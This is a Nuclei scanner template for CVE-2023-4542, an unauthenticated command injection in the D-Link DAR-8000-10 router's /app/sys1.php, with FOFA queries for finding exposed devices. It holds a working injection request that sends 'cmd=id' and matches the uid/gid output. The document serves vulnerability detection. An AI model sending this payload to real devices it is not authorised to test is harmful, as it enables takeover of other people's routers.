id: CVE-2023-4542 info: name: D-Link DAR-8000-10 - Command Injection author: pussycat0x severity: critical description: | D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection. impact: | Unauthenticated attackers can execute arbitrary operating system commands through the id parameter in /app/sys1.php, potentially gaining full control of the D-Link DAR-8000-10 router and intercepting all network traffic. remediation: | Update D-Link DAR-8000-10 firmware to a patched version that properly sanitizes the id parameter in sys1.php and prevents operating system command injection. reference: - https://github.com/20142995/sectool - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md - https://vuldb.com/?ctiid.238047 - https://vuldb.com/?id.238047 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4542 cwe-id: CWE-78 epss-score: 0.86533 epss-percentile: 0.99711 cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dlink product: dar-8000-10_firmware fofa-query: - body="DAR-8000-10" && title="D-Link" - body="dar-8000-10" && title="d-link" tags: cve,cve2023,dlink,vkev,vuln http: - raw: - | POST /app/sys1.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded cmd=id matchers-condition: and matchers: - type: regex part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - type: status status: - 200 # digest: 4a0a00473045022100fdeb3e43bcc4f5faee7d54e231d47ffd7b3bb061e766f431e12fcba2d994637e0220652ecbad52a963e91814aba4a5d829eb2ea5794f5e729c36b15c4191d6000697:922c64590222798bb761d5b6d8e72950